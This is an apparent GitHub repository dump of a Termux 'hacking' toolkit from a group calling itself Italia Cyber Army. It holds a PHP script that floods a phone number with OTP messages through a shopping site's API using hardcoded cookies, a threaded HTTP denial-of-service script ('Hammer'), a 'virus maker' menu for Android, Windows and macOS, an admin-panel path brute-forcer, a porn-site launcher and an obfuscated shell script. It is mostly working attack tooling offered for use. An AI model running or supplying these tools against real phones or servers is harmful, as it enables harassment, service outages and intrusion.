[![Test](https://img.shields.io/badge/tested%20on-Termux,%20Kali%20Linux,%20Ubuntu,%20Parrot%20OS,%20Debian,%20ANDRAX%20Mobile-%23ff69b4.svg?style=plastic)](https://github.com/Err0r-ICA/SpeedTest/issues) 39 | 40 | -------------------------------------------------------------------------------- /tool/WA.php: -------------------------------------------------------------------------------- 1 | 12){ 8 | $nomer = str_replace("+39","0",$nomer); 9 | } 10 | echo "Target: $nomer (y/n)"; 11 | $cek = trim(fgets(STDIN)); 12 | if($cek=="n") exit("Stopped!\n"); 13 | echo "Amount?\nInput : "; 14 | $jumlah = trim(fgets(STDIN)); 15 | for($a=0;$a<$jumlah;$a++) { 16 | $rand1 = md5(rand(12345678,98765432)); 17 | $rand2 = md5(rand(12345678,98765432)); 18 | $rand = array($rand1,$rand2); 19 | $rand3 = md5($rand[rand(1,2)]); 20 | $config['headers'] = explode("\n", "Host: m.bukalapak.com 21 | Connection: keep-alive 22 | Content-Length: 134 23 | Origin: https://m.bukalapak.com 24 | X-CSRF-Token: uYUfi93g92mZboBVB4UMwYInorBNOgyYEAbPUTikHht+xseF8BFUgg9qSgQWA9MRy7eL8G/SnbYUGg0JRM1fjw== 25 | User-Agent: Mozilla/5.0 (Linux; Android 7.1.2; Redmi 4X Build/N2G47H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.91 Mobile Safari/537.36 26 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 27 | Accept: */* 28 | X-Requested-With: XMLHttpRequest 29 | Save-Data: on 30 | Referer: https://m.bukalapak.com/register?from=home_mobile 31 | Accept-Encoding: gzip, deflate, br 32 | Accept-Language: en-US,en;q=0.9,id;q=0.8 33 | Cookie: identity=".$rand1."; browser_id=".$rand2."; _ga=GA1.2.1024758930.1531960985; _vwo_uuid_v2=DE8E70E7E9A8960F05F20FE0ACE87643B|378e4a2f30c36053c1cb833e89ecbc2e; _gid=GA1.2.622427606.1533988422; scs=%7B%22t%22%3A1%7D; spUID=15339884253603c43b2de12.c5b45553; session_id=e95e7511997432af179935abfce90320; __auc=3eed305416528d5f584187b45b2; G_ENABLED_IDPS=google; track_register=true; affiliate_landing_visit=true; mp_51467a440ff602e0c13d513c36387ea8_mixpanel=%7B%22distinct_id%22%3A%20%22164affd88ae1d-0791dbbd558a18-1f20130c-38400-164affd88aff4%22%2C%22utm_source%22%3A%20%22hasoffers-1851%22%2C%22utm_medium%22%3A%20%22affiliate%22%2C%22utm_campaign%22%3A%20%2215%22%2C%22%24initial_referrer%22%3A%20%22%24direct%22%2C%22%24initial_referring_domain%22%3A%20%22%24direct%22%7D; ins-gaSSId=cdd66ffd-18ce-a176-a3c3-26f0ac9ec000_1534027025; lskjfewjrh34ghj23brjh234=elBsSkNBb3VKS3hzZSttTnNKTm5VNk1pWmtzV1A1YldKRm1majAzRFdsSUJtcDJJV0psL0pnOFlBamtJU1NBa1Y2czlQdjZrNlFURDNiRmZqQmNRRXRyeWRTbGV5QUdpQnZjV3JocEc3ak9QeHpWSlpRNTE4eFgzR2FieDVnc2dWaUVoZzVzMEJlMVZwM2NKWk1LaXVwQTZuOXBVR01TUUJ4ejc4MW5MTU5taGYwZ2M0bFdwM05KYy9IcTh3bThsd3dzbSt4bHd4WG9NSklrcHJtT0dHUURURVQ5YVoyb0hLQ3dyUC9NZ2V6UUNFYmVGbE84REtqOHZlKzBZUGtiRS0tV3pMamNPNDhKT1FoZ202Q1BkNUJ5dz09--5a445aefe0c06b736c22e9f359ee3b7273058175; insdrSV=32; _td=7e03facb-a77c-4ce7-8b83-2427781c78c7"); 34 | global $config; 35 | $ar = http_build_query(array( 36 | 'feature' => 'phone_registration', 37 | 'feature_tag' => '', 38 | 'manual_phone' => $nomer, 39 | 'device_fingerprint' => $rand3, 40 | 'channel' => 'WhatsApp' 41 | ) 42 | ); 43 | $ch = curl_init(); 44 | curl_setopt($ch, CURLOPT_URL, "https://m.bukalapak.com/trusted_devices/otp_request"); 45 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 46 | curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); 47 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 48 | curl_setopt($ch, CURLOPT_HEADER, false); 49 | curl_setopt($ch, CURLOPT_HTTPHEADER, $config['headers']); 50 | curl_setopt($ch, CURLOPT_POST, 1); 51 | curl_setopt($ch, CURLOPT_POSTFIELDS, $ar); 52 | $asw = curl_exec($ch); 53 | curl_close($ch); 54 | print $a.$nomer." [Sending]\n"; 55 | } 56 | 57 | -------------------------------------------------------------------------------- /tool/coli.sh: -------------------------------------------------------------------------------- 1 | clear 2 | bi='\033[94;1m' #biru 3 | i='\033[92;1m' #ijo 4 | pur='\033[95;1m' #purple 5 | cy='\033[96;1m' #cyan 6 | me='\033[91;1m' #merah 7 | pu='\033[97;1m' #putih 8 | ku='\033[93;1m' #kuning 9 | mer='\033[1;97m' #Tepi 10 | R='\x1b[1;31m' 11 | G='\x1b[1;32m' 12 | B='\x1b[1;34m' 13 | Y='\x1b[1;33m' 14 | C='\x1b[1;36m' 15 | D='\x1b[0m' 16 | endc='\E[0m' 17 | enda='\033[0m' 18 | echo -e $cy"[+]=================================[+]" 19 | echo -e $cy"[+]$me ╔═╦╗╔╦═╦╗╔╗ ╔╗ ╔══╦══╗ $cy [+]" 20 | echo -e $cy"[+]$me ║╔╣╚╝║║║║║║╔═╗║║ ║ ═╣ ═╣ $cy [+]" 21 | echo -e $cy"[+]$pu ║╚╣╔╗║║║╚╝║╚═╝║╚═╣ ═╣ ═╣ $cy [+]" 22 | echo -e $cy"[+]$pu ╚═╩╝╚╩═╩══╝ ╚══╩══╩══╝ $cy [+]" 23 | echo -e $cy"[+]=================================[+]" 24 | echo -e $pu"[+]==$me Author : ERR0R$pu ==[+]" 25 | echo -e $pu"[+]==$me Team : ITALIA CYBER ARMY$pu ==[+]" 26 | echo -e $pu"[+]==$me Instagram : @termux_hacking$pu ==[+]" 27 | echo -e $pu"[+]==$me Telegram : termuxxhacking$pu ==[+]" 28 | echo -e $pu"[+]=================================[+]" 29 | echo 30 | echo -e $me"╔═══════════════════════════════════════╗" 31 | echo -e $me"║ DONT Forget to Follow !!! ║" 32 | echo -e $me"╚═══════════════════════════════════════╝" 33 | echo 34 | echo -e $pur"["$i"0"$pur"]"$ku" Download VPN Gratis" 35 | echo -e $cy"["$me"1"$cy"]"$i" Hihihi JAV" 36 | echo -e $cy"["$me"2"$cy"]"$i" Brazzer" 37 | echo -e $cy"["$me"3"$cy"]"$i" Porn Hub" 38 | echo -e $cy"["$me"4"$cy"]"$i" Pink Lips" 39 | echo -e $cy"["$me"5"$cy"]"$i" XNXX" 40 | echo -e $cy"["$me"6"$cy"]"$i" Tube Galore" 41 | echo -e $cy"["$me"7"$cy"]"$i" Nice Porn" 42 | echo -e $cy"["$me"8"$cy"]"$i" Red Porn" 43 | echo -e $cy"["$me"9"$cy"]"$i" X-Videos" 44 | echo -e $cy"["$me"10"$cy"]"$i" Tube V-Sex" 45 | echo -e $pur"["$i"99"$pur"]"$ku" Street of Penance" 46 | echo 47 | echo -e $cy"{"$me"•"$cy"}"$i"Requires VPN Connection" 48 | echo -e $cy"["$me"•"$cy"]"$i"Turn on VPN first" 49 | echo -e $cy"["$me"•"$cy"]"$i"Who Doesn't Have to Choose No.2?" 50 | echo 51 | echo -e $me"╭─# Select Your Favorite Porn :" 52 | read -p "╰───[?] Root@Porn : " pil 53 | if [ $pil = '0' ] 54 | then 55 | echo -e $pu"Loading........" 56 | sleep 2 57 | echo -e $cy"Opening Play Store......." 58 | sleep 2 59 | xdg-open https://play.google.com/store/apps/details?id=free.vpn.unblock.proxy.turbovpn 60 | sh Bokep.sh 61 | fi 62 | if [ $pil = '1' ] 63 | then 64 | echo -e $pu"Loading........" 65 | sleep 2 66 | echo -e $cy"Opening Website......." 67 | sleep 2 68 | xdg-open https://www1.javhihi.com/ 69 | sh Bokep.sh 70 | fi 71 | if [ $pil = '2' ] 72 | then 73 | echo -e $pu"Loading........" 74 | sleep 2 75 | echo -e $cy"Opening Website......." 76 | sleep 2 77 | xdg-open http://www.brazzer.com 78 | sh Bokep.sh 79 | fi 80 | if [ $pil = '3' ] 81 | then 82 | echo -e $pu"Loading........" 83 | sleep 2 84 | echo -e $cy"Opening Website......." 85 | sleep 2 86 | xdg-open https://www.pornhub.com 87 | sh Bokep.sh 88 | fi 89 | if [ $pil = '4' ] 90 | then 91 | echo -e $pu"Loading........" 92 | sleep 2 93 | echo -e $cy"Opening Website......." 94 | sleep 2 95 | xdg-open http://pinkclips.mobi/ 96 | sh Bokep.sh 97 | fi 98 | if [ $pil = '5' ] 99 | then 100 | echo -e $pu"Loading........" 101 | sleep 2 102 | echo -e $cy"Opening Website......." 103 | sleep 2 104 | xdg-open https://www.xnxx.com 105 | sh Bokep.sh 106 | fi 107 | if [ $pil = '6' ] 108 | then 109 | echo -e $pu"Loading........" 110 | sleep 2 111 | echo -e $cy"Opening Website......." 112 | sleep 2 113 | xdg-open https://www.tubegalore.com 114 | sh Bokep.sh 115 | fi 116 | if [ $pil = '7' ] 117 | then 118 | echo -e $pu"Loading........" 119 | sleep 2 120 | echo -e $cy"Opening Website......." 121 | sleep 2 122 | xdg-open https://niceporn.xxx 123 | sh Bokep.sh 124 | fi 125 | if [ $pil = '8' ] 126 | then 127 | echo -e $pu"Loading........" 128 | sleep 2 129 | echo -e $cy"Opening Website......." 130 | sleep 2 131 | xdg-open https://redporn.xxx 132 | sh Bokep.sh 133 | fi 134 | if [ $pil = '9' ] 135 | then 136 | echo -e $pu"Loading........" 137 | sleep 2 138 | echo -e $cy"Opening Website......." 139 | sleep 2 140 | xdg-open https://www.xvideos.com 141 | sh Bokep.sh 142 | fi 143 | if [ $pil = '10' ] 144 | then 145 | echo -e $pu"Loading........" 146 | sleep 2 147 | echo -e $cy"Opening Website......." 148 | sleep 2 149 | xdg-open https://www.tubev.sex/ 150 | sh Bokep.sh 151 | fi 152 | if [ $pil = '99' ] 153 | then 154 | clear 155 | echo -e $i"Pilihan Yang Patut Di Contoh" 156 | sleep 1 157 | echo -e $i"Semoga Dosamu Di Ampuni" 158 | sleep 1 159 | echo -e $cy"Semoga Jadi Anak Yang Sholeh/Sholehah" 160 | sleep 1 161 | echo -e $cy"See You Next Time" 162 | sleep 1 163 | fi 164 | -------------------------------------------------------------------------------- /tool/hammer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | 4 | # python 3.3.2+ Hammer Dos Script v.1 5 | # by Can Yalçın 6 | # only for legal purpose 7 | 8 | 9 | from queue import Queue 10 | from optparse import OptionParser 11 | import time,sys,socket,threading,logging,urllib.request,random 12 | 13 | def user_agent(): 14 | global uagent 15 | uagent=[] 16 | uagent.append("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14") 17 | uagent.append("Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0") 18 | uagent.append("Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3") 19 | uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)") 20 | uagent.append("Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7") 21 | uagent.append("Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)") 22 | uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1") 23 | return(uagent) 24 | 25 | 26 | def my_bots(): 27 | global bots 28 | bots=[] 29 | bots.append("http://validator.w3.org/check?uri=") 30 | bots.append("http://www.facebook.com/sharer/sharer.php?u=") 31 | return(bots) 32 | 33 | 34 | def bot_hammering(url): 35 | try: 36 | while True: 37 | req = urllib.request.urlopen(urllib.request.Request(url,headers={'User-Agent': random.choice(uagent)})) 38 | print("\033[94mbot is hammering...\033[0m") 39 | time.sleep(.1) 40 | except: 41 | time.sleep(.1) 42 | 43 | 44 | def down_it(item): 45 | try: 46 | while True: 47 | packet = str("GET / HTTP/1.1\nHost: "+host+"\n\n User-Agent: "+random.choice(uagent)+"\n"+data).encode('utf-8') 48 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 49 | s.connect((host,int(port))) 50 | if s.sendto( packet, (host, int(port)) ): 51 | s.shutdown(1) 52 | print ("\033[92m",time.ctime(time.time()),"\033[0m \033[94m <--packet sent! hammering--> \033[0m") 53 | else: 54 | s.shutdown(1) 55 | print("\033[91mShut<->Down\033[0m") 56 | time.sleep(.1) 57 | except socket.error as e: 58 | print("\033[91mNO Connection! Server Maybe Down\033[0m") 59 | #print("\033[91m",e,"\033[0m") 60 | time.sleep(.1) 61 | 62 | 63 | def dos(): 64 | while True: 65 | item = q.get() 66 | down_it(item) 67 | q.task_done() 68 | 69 | 70 | def dos2(): 71 | while True: 72 | item=w.get() 73 | bot_hammering(random.choice(bots)+"http://"+host) 74 | w.task_done() 75 | 76 | 77 | def usage(): 78 | print (''' \033[92m Hammer Dos Script v.1 http://www.canyalcin.com/ 79 | It is the end user's responsibility to obey all applicable laws. 80 | It is just for server testing script. Your ip is visible. \n 81 | usage : python3 hammer.py [-s] [-p] [-t] 82 | -h : help 83 | -s : server ip 84 | -p : port default 80 85 | -t : turbo default 135 \033[0m''') 86 | sys.exit() 87 | 88 | 89 | def get_parameters(): 90 | global host 91 | global port 92 | global thr 93 | global item 94 | optp = OptionParser(add_help_option=False,epilog="Hammers") 95 | optp.add_option("-q","--quiet", help="set logging to ERROR",action="store_const", dest="loglevel",const=logging.ERROR, default=logging.INFO) 96 | optp.add_option("-s","--server", dest="host",help="attack to server ip -s ip") 97 | optp.add_option("-p","--port",type="int",dest="port",help="-p 80 default 80") 98 | optp.add_option("-t","--turbo",type="int",dest="turbo",help="default 135 -t 135") 99 | optp.add_option("-h","--help",dest="help",action='store_true',help="help you") 100 | opts, args = optp.parse_args() 101 | logging.basicConfig(level=opts.loglevel,format='%(levelname)-8s %(message)s') 102 | if opts.help: 103 | usage() 104 | if opts.host is not None: 105 | host = opts.host 106 | else: 107 | usage() 108 | if opts.port is None: 109 | port = 80 110 | else: 111 | port = opts.port 112 | if opts.turbo is None: 113 | thr = 135 114 | else: 115 | thr = opts.turbo 116 | 117 | 118 | # reading headers 119 | global data 120 | headers = open("headers.txt", "r") 121 | data = headers.read() 122 | headers.close() 123 | #task queue are q,w 124 | q = Queue() 125 | w = Queue() 126 | 127 | 128 | if __name__ == '__main__': 129 | if len(sys.argv) < 2: 130 | usage() 131 | get_parameters() 132 | print("\033[92m",host," port: ",str(port)," turbo: ",str(thr),"\033[0m") 133 | print("\033[94mPlease Wait...\033[0m") 134 | user_agent() 135 | my_bots() 136 | time.sleep(5) 137 | try: 138 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 139 | s.connect((host,int(port))) 140 | s.settimeout(1) 141 | except socket.error as e: 142 | print("\033[91mCheck Server IP And Port\033[0m") 143 | usage() 144 | while True: 145 | for i in range(int(thr)): 146 | t = threading.Thread(target=dos) 147 | t.daemon = True # if thread is exist, it dies 148 | t.start() 149 | t2 = threading.Thread(target=dos2) 150 | t2.daemon = True # if thread is exist, it dies 151 | t2.start() 152 | start = time.time() 153 | #tasking 154 | item = 0 155 | while True: 156 | if (item>1800): # for no memory crash 157 | item=0 158 | time.sleep(.1) 159 | item = item + 1 160 | q.put(item) 161 | w.put(item) 162 | q.join() 163 | w.join() 164 | -------------------------------------------------------------------------------- /tool/vbug.py: -------------------------------------------------------------------------------- 1 | """ 2 | Author : DedSecTL 3 | Date : 19-07-2017 4 | Name : Vbug Maker 5 | Purpose : Generate virus for Android 6 | Thanks to Mr_Silent, Ghifari, Mr.Holmes, Mr_/bon'007, ID_OUT96... 7 | Copyright (c) 2017, DedSecTL All rights reserved. 8 | 9 | Redistribution and use in source and binary forms, with or without modification, 10 | are permitted provided that the following conditions are met: * Redistributions 11 | of source code must retain the above copyright notice, this list of conditions and 12 | the following disclaimer. * Redistributions in binary form must reproduce the above 13 | copyright notice, this list of conditions and the following disclaimer in the 14 | documentation and/or other materials provided with the distribution. * Neither the 15 | name of the nor the names of its contributors may be used to endorse or promote 16 | products derived from this software without specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 19 | "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, 20 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT, 22 | INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 23 | PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS 24 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 25 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 26 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 27 | """ 28 | import os, sys, time 29 | R = '\x1b[1;31m' 30 | N = '\x1b[0m' 31 | Y = '\x1b[1;33m' 32 | G = '\x1b[1;37m' 33 | 34 | def restart_program(): 35 | python = sys.executable 36 | os.execl(python, python, *sys.argv) 37 | curdir = os.getcwd() 38 | 39 | 40 | def banner(): 41 | print '%s _ _ %s' % (R, N) 42 | print '%s _ _ | |_ _ _ %s ___ _____ %s ___ | |_ ___ ___ %s' % (R, Y, R, N) 43 | print "%s | | || . || | |%s| . | | |%s| .'|| '_|| -_|| _| %s" % (R, Y, R, N) 44 | print '%s \\_/ |___||___|%s|_ | | |_|_|%s|__,||_,_||___||_| %s' % (R, Y, R, N) 45 | print '%s __________________| | | |_______________________ %s' % (Y, N) 46 | print '%s|____________________| |_________________________| %s' % (Y, N) 47 | 48 | 49 | clear = lambda : os.system('clear') 50 | clear() 51 | banner() 52 | print 53 | print '%sVBu%sg M%saker %s19-07-2017 %s(5:29)%s' % (R, Y, R, G, Y, N) 54 | print '%sAuthor : %sERR0R%s' % (G, R, N) 55 | print '%sSpecial Thanks : %sHendriyawan %s( mr_silent )%s' % (G, R, Y, N) 56 | print '%sCode : %sPython%s' % (G, Y, N) 57 | print '%sSupport by : %sGhifari%s' % (G, R, N) 58 | print '%sDescription : %sMake a %sVirus.sh%s' % (G, Y, R, N) 59 | print '%s@___%sAndroSec%s1337 Dev%s_____%s' % (Y, G, R, Y, N) 60 | print '%s* %sTrust Me %s-- %sIm Coder %s*%s\n' % (Y, G, R, G, Y, N) 61 | enter = raw_input('%s[%s~%s]%s Press Enter to Continue...%s' % (Y, R, Y, R, N)) 62 | clear() 63 | banner() 64 | print '%s#%s---------------%s VBu%sg%s--%sM%saker %s----------------%s#%s' % (R, Y, R, Y, R, Y, R, Y, R, N) 65 | print '%s|%s WE DONT take responsibility for the use of this %s|%s' % (Y, G, Y, N) 66 | print '%s|%s program %s|%s' % (Y, G, Y, N) 67 | print '%s#%s---------------%s ----------- %s----------------%s#%s' % (R, Y, R, Y, R, N) 68 | print '%s|%s VBu%sg M%saker %sv1.0 19-07-2017 %s(5:29) |%s' % (Y, R, Y, R, G, Y, N) 69 | print '%s|%s Author : ERR0R %s|%s' % (Y, G, Y, N) 70 | print '%s|%s Github : https://github.com/Err0r-ICA %s|%s' % (Y, G, Y, N) 71 | print '%s|%s Team : ITALIA%s CYBER ARMY %s|%s' % (Y, G, R, G, Y, N) 72 | print '%s|%s Version : 1.0 -- Blackhole Project %s|%s' % (Y, G, Y, N) 73 | print '%s|%s Copyright (c) 2017, DedSecTL All rights reserved %s|%s' % (Y, G, Y, N) 74 | print '%s#%s---------------%s ----------- %s----------------%s#%s' % (R, Y, R, Y, R, N) 75 | print 76 | print '%s[%s#%s]%s Options%s' % (Y, R, Y, G, N) 77 | print '%s {%s01%s} %s~> %sGenerate Virus for Android%s' % (R, G, R, Y, G, N) 78 | print '%s {%s02%s} %s~> %sGenerate Virus for Window %s' % (R, G, R, Y, G, N) 79 | print '%s {%s03%s} %s~> %sGenerate Virus for MacOSX %s' % (R, G, R, Y, G, N) 80 | print '%s {%s04%s} %s~> %sEXIT%s\n' % (R, G, R, Y, G, N) 81 | opsi = raw_input('%sVIBUM%s > %sChoose ' % (R, Y, G)) 82 | print '%s' % N 83 | if opsi.strip() in ('01 1').split(): 84 | try: 85 | import anvima 86 | except ImportError: 87 | print '%s[%s!%s]%s ERROR%s: %sanvima%s:%s NOT found%s' % (Y, R, Y, R, Y, G, Y, G, N) 88 | sys.exit() 89 | 90 | if opsi.strip() in ('02 2').split(): 91 | try: 92 | import winvima 93 | except ImportError: 94 | print '%s[%s!%s]%s ERROR%s: %swinvima%s:%s NOT found%s' % (Y, R, Y, R, Y, G, Y, G, N) 95 | sys.exit() 96 | 97 | if opsi.strip() in ('03 3').split(): 98 | try: 99 | import macvima 100 | except ImportError: 101 | print '%s[%s!%s]%s ERROR%s: %smacvima%s:%s NOT found%s' % (Y, R, Y, R, Y, G, Y, G, N) 102 | sys.exit() 103 | 104 | if opsi.strip() in ('04 4').split(): 105 | sys.exit() 106 | else: 107 | print '%s[%s!%s]%s ERROR: Wrong Input...%s' % (Y, R, Y, G, N) 108 | time.sleep(2) 109 | restart_program() 110 | -------------------------------------------------------------------------------- /tool/admin.py: -------------------------------------------------------------------------------- 1 | #/usr/bin/python 2 | 3 | # This was written for educational purpose only. Use it at your own risk. 4 | # Author will be not responsible for any damage! 5 | # !!! Special greetz for my friend !!! 6 | # !!! Special thanx for my team !!! 7 | # 8 | ################################################################ 9 | # --- ERR0R ./Chu404 ~ Reentz ~ Zx'Phoenix ~ RC_Hunter. --- # 10 | # --- Pandora ~ Mr.Dongkrak ~./F4LL ~ Mr.Yazz. --- # 11 | # ---- Mr.Agency ~ Floxytru3 ~ Zona Nolep ~ Mr. Faino --- # 12 | # --- Gatra ~ IM ./PanjulL21 ~ Mr.s3lf ~ Mr.White. --- # 13 | # --- w4rnetx ~ Blue Dragon. --- # 14 | # --- https://www.ITALIA-CYBER-ARMY.blogspot.com. --- # 15 | ################################################################ 16 | # 17 | # 18 | # Based on Web admin locator by ERR0R 19 | # 20 | # 21 | # 22 | 23 | 24 | 25 | import sys, os, time, httplib 26 | 27 | if sys.platform == 'linux' or sys.platform == 'linux2': 28 | clearing = 'clear' 29 | else: 30 | clearing = 'cls' 31 | os.system(clearing) 32 | 33 | 34 | if len(sys.argv) != 2: 35 | print "\n|---------------------------------------------------|" 36 | print "| termuxx[@]gmail[dot]com |" 37 | print "| 04/2k20 Admin login finder v2.0 |" 38 | print "| Help: python2 admin.py -h |" 39 | print "| Visit https://www.instagram.com/termux_hacking |" 40 | print "|---------------------------------------------------|\n" 41 | sys.exit(1) 42 | 43 | for arg in sys.argv: 44 | if arg == '-h': 45 | print "\n|--------------------------------------------------|" 46 | print "| termuxx[@]gmail[dot]com |" 47 | print "| 04/2k20 Admin login finder v2.0 |" 48 | print "| Usage: python2 admin.py www.site.com |" 49 | print "| Example: python2 admin.py site.com |" 50 | print "| Visit https://www.instagram.com/termux_hacking |" 51 | print "|--------------------------------------------------|\n" 52 | sys.exit(1) 53 | 54 | 55 | 56 | site = sys.argv[1].replace("http://","").rsplit("/",1)[0] 57 | site = site.lower() 58 | 59 | admin_path = ['admin.php','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/','memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php','joomla/administrator','login.php', 60 | 'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html','admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html','admin/controlpanel.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html','webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html','admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php','administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php','bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','modelsearch/login.php','moderator.php','moderator/login.php','moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php', 61 | 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html','webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html','administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html','panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','adminarea/index.php','adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php','adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php'] 62 | 63 | 64 | print "\n|---------------------------------------------------|" 65 | print "| termuxx[@]gmail[dot]com |" 66 | print "| Author : *ERR0R* |" 67 | print "| 04/2k20 Admin login finder v2.0 |" 68 | print "| Visit https://www.instagram.com/termux_hacking |" 69 | print "|---------------------------------------------------|\n" 70 | print "\n[-] %s" % time.strftime("%X") 71 | 72 | print "[+] Target:",site 73 | print "[+] Checking Paths..." 74 | print 75 | 76 | 77 | try: 78 | for admin in admin_path: 79 | admin = admin.replace("\n","") 80 | admin = "/" + admin 81 | connection = httplib.HTTPConnection(site) 82 | connection.request("GET",admin) 83 | response = connection.getresponse() 84 | print "%s %s %s" % (admin, response.status, response.reason) 85 | except(KeyboardInterrupt,SystemExit): 86 | raise 87 | except: 88 | pass 89 | -------------------------------------------------------------------------------- /WannaTool: -------------------------------------------------------------------------------- 1 | z=" 2 | ";tDz='$B"╚';vz='████';cEz='"$W"';IBz='y $C';aEz='╚═══';az=' -e ';Uz='endc';HDz=' Usi';kz=' ══$';DBz=' Use';WDz='u Ca';JGz='/Err';JBz=' ║"';rFz='ram.';Ez='1;91';ODz='ly ';tCz='$R &';PEz='p 1';EBz=' Wis';TFz='then';IGz='.com';EGz=''\''4'\'' ';vCz='irst';hDz='hen ';nz=' Wan';hz='══╗"';OEz='═╝"';QFz='l = ';gDz='$R W';tBz='03/2';qBz='ate ';jFz='R"';IEz='OLLO';HBz='en b';Oz='M='\''\';AFz=' $W';aDz='$W S';CEz='DO N';RCz='efor';lCz='ser ';dBz='f Th';dFz='fi';NBz='CYBR';gBz='══╝"';mDz='Y Of';LEz='TAGR';oz='naTo';SEz='$G"|';EEz='ORGE';pz='ol T';gEz='║$M ';bEz='$W"╔';nDz=' Thi';EFz='═══$';tEz='$M 4';XFz='d +x';Gz='G='\''\';HFz='$G ═';TEz='$C 1';pDz='ol. ';Sz='D='\''\';BFz=' '\'''\''';HGz='thub';eDz='s ';iBz='IA$W';dCz='swor';mFz='open';cFz='py';kCz='ad U';TDz=' Req';SFz=']';YCz=' "║$';bCz='me &';yFz='cd i';oCz='d To';dEz='$W"║';GFz='oose';NFz='l';dz='━━━╮';BCz=' Aut';SDz='tall';PDz=' ║"';vDz=' "╚═';ZEz='G ║"';pCz='ols ';kEz='Pass';sz='ing$';nBz='"$M ';FBz='ely,';sCz='$G ';GBz=' Giv';JCz='p 1.';MEz='AM$G';YFz=' *';SBz=' WE ';KFz=' -p ';JEz='W ON';fBz='"╚══';oDz='s To';TCz='e To';qz='ool ';hBz='ITAL';tFz='term';uDz='╝"$C';HCz='━━━╯';REz='╔═══';mCz=' $M ';cBz='se o';Nz='1;96';kBz='ER$R';DFz='3';eEz='$M 2';QCz='$R B';yz='"';vFz='acki';rDz='ks. ';XCz='║"$G';wz='$W██';eFz=''\''2'\'' ';IFz='═══"';yDz='═╗"';YEz='ols$';MCz='╗"$C';PCz='$M"║';EDz='or a';VDz='Y Yo';MFz='" pi';aCz='erna';GCz='$W"╰';Hz='1;92';LBz=' ITA';hCz='leas';OCz='═══╗';xz='██$R';mEz='╗"';LGz='CA"';LFz='═➢➢ ';Wz='[0m'\''';HEz='$B F';Mz='C='\''\';NDz='eful';yEz='am ';jBz=' CYB';kDz='The ';jEz='r & ';xCz='nger';rCz='NO ';DEz='OT F';ICz='slee';WFz='chmo';ADz='id o';ZFz='pyth';rBz=': $G';SCz='e Th';FEz='T TO';FCz='0R $';sBz=' 30/';eCz='d 